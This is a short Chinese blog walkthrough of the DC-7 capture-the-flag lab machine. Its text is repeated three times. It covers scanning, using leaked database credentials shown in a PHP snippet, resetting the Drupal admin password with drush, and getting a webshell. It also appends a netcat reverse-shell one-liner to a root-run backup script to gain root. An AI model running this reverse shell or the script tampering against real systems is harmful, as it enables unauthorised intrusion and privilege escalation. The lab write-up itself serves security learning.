DC-7 学习过程

DC-7

上线自带ip

打开目标网页

nmap扫一下

百度搜索@DC7USER

都看看，发现配置文件中有服务器的账号密码

获得数据库账号密码，试一下刚才扫出来的22端口能否登陆

    $用户名= "dc7user";
    $密码= " MdR3xOgB7#dW "; 
    $dbname = "Staff";
    $conn = mysqli_connect（$服务器名，  $用户名，  $密码，  $dbname);

成功登陆

查看当前文件，提示有一份新邮件在那个目录：

巨长一篇，翻译看不懂，放弃

进入网站根目录，修改网站管理员密码

drush user-password admin --password=“123456”

尝试登陆

找啊找

需要安装php插件才能写入PHP

给服务器安装php插件安装成功后开始尝试连接蚁剑

Python –c ‘import pty;pty.spawn(“/bin/bash”)’ 回显

发现不是root，进行提权

将以下命令追加至/opt/scripts/backups.sh文件中

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.9.xxx.xxx 1111>/tmp/f

等待很久，，，才能上线，上线后为root权限

posted @ 2020-12-07 13:09 突然好想吃阅读(323) 评论(0) 收藏举报

刷新页面返回顶部

MR`SH

DC-7 学习过程

DC-7

上线自带ip

打开目标网页

nmap扫一下

查看网站子目录，没有发现有用目录

百度搜索@DC7USER

都看看，发现配置文件中有服务器的账号密码

获得数据库账号密码，试一下刚才扫出来的22端口能否登陆

成功登陆

查看当前文件，提示有一份新邮件在那个目录：

巨长一篇，翻译看不懂，放弃

进入网站根目录，修改网站管理员密码

尝试登陆

找啊找

需要安装php插件才能写入PHP

给服务器安装php插件安装成功后开始尝试连接蚁剑

Python –c ‘import pty;pty.spawn(“/bin/bash”)’ 回显

发现不是root，进行提权

将以下命令追加至/opt/scripts/backups.sh文件中

等待很久，，，才能上线，上线后为root权限

公告

MR`SH

DC-7 学习过程

DC-7

上线自带ip

打开目标网页

nmap扫一下

查看网站子目录，没有发现有用目录

百度搜索@DC7USER

都看看，发现配置文件中有服务器的账号密码

获得数据库账号密码，试一下刚才扫出来的22端口能否登陆

成功登陆

查看当前文件，提示有一份新邮件在那个目录：

巨长一篇， 翻译看不懂，放弃

进入网站根目录，修改网站管理员密码

尝试登陆

找啊找

需要安装php插件才能写入PHP

给服务器安装php插件安装成功后开始尝试连接蚁剑

Python –c ‘import pty;pty.spawn(“/bin/bash”)’ 回显

发现不是root，进行提权

将以下命令追加至/opt/scripts/backups.sh文件中

等待很久，，，才能上线，上线后为root权限

公告

巨长一篇，翻译看不懂，放弃